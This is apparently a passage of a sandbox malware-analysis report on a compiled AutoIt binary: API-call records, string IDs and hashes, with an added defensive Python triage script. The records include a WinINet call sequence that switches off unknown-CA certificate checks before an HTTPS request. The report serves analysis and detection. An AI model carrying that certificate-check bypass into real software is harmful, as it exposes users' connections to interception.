                                                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                APIs
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                Similarity
                                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                • String ID:
                                                • API String ID: 978794511-0
                                                • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                Similarity
                                                • API ID: _memmove$_memcmp
                                                • String ID: '$\$h
                                                • API String ID: 2205784470-1303700344
                                                • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                APIs
                                                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                • VariantClear.OLEAUT32 ref: 0045EA6D
                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                • __swprintf.LIBCMT ref: 0045EC33
                                                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                Strings
                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                Similarity
                                                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                • API String ID: 2441338619-1568723262
                                                • Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                APIs
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                • String ID: @COM_EVENTOBJ
                                                • API String ID: 327565842-2228938565
                                                • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                APIs
                                                • VariantClear.OLEAUT32(?), ref: 0047031B
                                                • VariantClear.OLEAUT32(?), ref: 0047044F
                                                • VariantInit.OLEAUT32(?), ref: 004704A3
                                                • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                • VariantClear.OLEAUT32(?), ref: 00470516
                                                  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                Similarity
                                                • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                • String ID: H
                                                • API String ID: 3613100350-2852464175
                                                • Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                • DestroyWindow.USER32(?), ref: 00426F50
                                                • UnregisterHotKey.USER32(?), ref: 00426F77
                                                • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 4174999648-3243417748
                                                • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                Similarity
                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                • String ID:
                                                • API String ID: 1291720006-3916222277
                                                • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                • IsMenu.USER32(?), ref: 0045FC5F
                                                • CreatePopupMenu.USER32 ref: 0045FC97
                                                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                • String ID: 0$2
                                                • API String ID: 93392585-3793063076
                                                • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                APIs
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                • VariantClear.OLEAUT32(?), ref: 00435320
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                • VariantClear.OLEAUT32(?), ref: 004353B3
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                Similarity
                                                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                • String ID: crts
                                                • API String ID: 586820018-3724388283
                                                • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                APIs
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                • _wcscat.LIBCMT ref: 0044BCAF
                                                • _wcslen.LIBCMT ref: 0044BCBB
                                                • _wcslen.LIBCMT ref: 0044BCD1
                                                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                Similarity
                                                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 2326526234-1173974218
                                                • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                APIs
                                                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                • _wcslen.LIBCMT ref: 004335F2
                                                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                • GetLastError.KERNEL32 ref: 0043362B
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                • _wcsrchr.LIBCMT ref: 00433666
                                                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                • String ID: \
                                                • API String ID: 321622961-2967466578
                                                • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 1038674560-2734436370
                                                • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
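Two records in this part of the execution graph carry most of the triage value: the WinINet sequence above (InternetConnectW, HttpOpenRequestW, InternetQueryOptionW/InternetSetOptionW with option 0000001F and value 00000100, HttpSendRequestW, HttpQueryInfoW with 00000005) and the __wcsnicmp record whose String ID holds the AutoIt script directives #OnAutoItStartRegister, #notrayicon and #requireadmin. The following is an added example, not part of the Joe Sandbox report or of the sample: a small Python triage script that parses the report's "APIs" and "String ID" lines, decodes the constants from the Windows SDK wininet.h (INTERNET_OPTION_SECURITY_FLAGS = 0x1F, SECURITY_FLAG_IGNORE_UNKNOWN_CA = 0x100, HTTP_QUERY_CONTENT_LENGTH = 5) and reports that the binary switches off the unknown-CA check on its HTTPS request and contains the directive strings of a compiled AutoIt interpreter stub. The two sample records are copied from this report; the regexes, data classes and finding wording are the example's own.

```python
import re
from dataclasses import dataclass, field

# Constants from the Windows SDK (wininet.h); only the subset needed for these records.
INTERNET_OPTION_SECURITY_FLAGS = 31  # 0x1F, second argument of Internet{Query,Set}OptionW
SECURITY_FLAGS = {
    0x0080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x0100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x0200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x1000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x2000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}
# Script directives present in the string table of a compiled AutoIt interpreter stub.
AUTOIT_DIRECTIVES = {"#OnAutoItStartRegister", "#notrayicon", "#requireadmin"}

# One "APIs" line of a Joe Sandbox function record, e.g.
#   • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
#   • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
_CALL = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w@]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
_STRING_ID = re.compile(r"•\s*String ID:\s*(?P<ids>.*)$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # int for hex literals, None for '?' (value not resolved by the plugin), else raw text
    ref: int     # address of the call site

@dataclass
class Record:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)

def _arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", tok) else tok

def parse_record(text: str) -> Record:
    """Parse the 'APIs' and 'String ID' lines of one function record."""
    rec = Record()
    for line in text.splitlines():
        m = _CALL.search(line.strip())
        if m:
            raw = m.group("args") or ""
            args = [_arg(a) for a in raw.split(",") if a.strip()]
            rec.calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
            continue
        m = _STRING_ID.search(line.strip())
        if m:
            rec.strings.extend(s for s in m.group("ids").split("$") if s)
    return rec

def decode_security_flags(value: int) -> list:
    """Names of the SECURITY_FLAG_IGNORE_* bits set in an INTERNET_OPTION_SECURITY_FLAGS value."""
    return [name for bit, name in sorted(SECURITY_FLAGS.items()) if value & bit]

def triage(rec: Record) -> list:
    """Findings for one record; each call-level finding names its call-site address."""
    findings = []
    seen = {c.api for c in rec.calls}
    if {"InternetConnectW", "HttpOpenRequestW", "HttpSendRequestW"} <= seen:
        findings.append("WinINet HTTP request sequence (connect -> open request -> send)")
    for c in rec.calls:
        if (c.api == "InternetSetOptionW" and len(c.args) >= 3
                and c.args[1] == INTERNET_OPTION_SECURITY_FLAGS and isinstance(c.args[2], int)):
            names = decode_security_flags(c.args[2])
            if names:
                findings.append(f"TLS validation weakened at {c.ref:08X}: {', '.join(names)}")
        if c.api == "HttpQueryInfoW" and len(c.args) >= 2 and c.args[1] in HTTP_QUERY:
            findings.append(f"HttpQueryInfoW at {c.ref:08X} reads {HTTP_QUERY[c.args[1]]}")
    hits = sorted(AUTOIT_DIRECTIVES & set(rec.strings))
    if hits:
        findings.append("compiled AutoIt script (directives: " + ", ".join(hits) + ")")
    return findings

# Sample input: the two records above, copied from this report.
WININET_RECORD = """
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
"""
AUTOIT_RECORD = """
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
"""

if __name__ == "__main__":
    for name, text in (("wininet", WININET_RECORD), ("autoit", AUTOIT_RECORD)):
        for finding in triage(parse_record(text)):
            print(f"[{name}] {finding}")
```

The value 00000100 passed with option 0000001F is what makes the WinINet record interesting: InternetQueryOptionW reads the current security flags, InternetSetOptionW writes them back with SECURITY_FLAG_IGNORE_UNKNOWN_CA set, and the request then goes out to a server whose certificate need not chain to a trusted CA. The same call pair appears in legitimate downloaders built with certificate checks disabled, so the finding is weighed together with the rest of the report rather than used on its own.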
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                • LoadStringW.USER32(00000000), ref: 00434060
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                • LoadStringW.USER32(00000000), ref: 00434078
                                                • _wprintf.LIBCMT ref: 004340A1
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                • __lock.LIBCMT ref: 00417981
                                                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                • __lock.LIBCMT ref: 004179A2
                                                • ___addlocaleref.LIBCMT ref: 004179C0
                                                Similarity
                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                • String ID: KERNEL32.DLL$pI
                                                • API String ID: 637971194-197072765
                                                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                Similarity
                                                • API ID: _memmove$_malloc
                                                • String ID:
                                                • API String ID: 1938898002-0
                                                • Opcode ID: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                • Opcode Fuzzy Hash: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                APIs
                                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                Similarity
                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                • String ID:
                                                • API String ID: 3771399671-0
                                                • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                • _memmove.LIBCMT ref: 0044B555
                                                • _memmove.LIBCMT ref: 0044B578
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                • String ID:
                                                • API String ID: 2737351978-0
                                                • Opcode ID: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                • Opcode Fuzzy Hash: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                • __calloc_crt.LIBCMT ref: 00415246
                                                • __getptd.LIBCMT ref: 00415253
                                                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                • _free.LIBCMT ref: 0041529E
                                                • __dosmaperr.LIBCMT ref: 004152A9
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Similarity
                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                • String ID:
                                                • API String ID: 3638380555-0
                                                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                Strings
                                                Similarity
                                                • API ID: Variant$Copy$ClearErrorInitLast
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 3207048006-625585964
                                                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                • gethostbyname.WSOCK32(?), ref: 004655A6
                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                • _memmove.LIBCMT ref: 004656CA
                                                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                • WSACleanup.WSOCK32 ref: 00465762
                                                Similarity
                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                • String ID:
                                                • API String ID: 2945290962-0
                                                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                APIs
                                                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                Similarity
                                                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                • String ID:
                                                • API String ID: 1457242333-0
                                                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                Similarity
                                                • API ID: ConnectRegistry_memmove_wcslen
                                                • String ID:
                                                • API String ID: 15295421-0
                                                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcstok.LIBCMT ref: 004675B2
                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
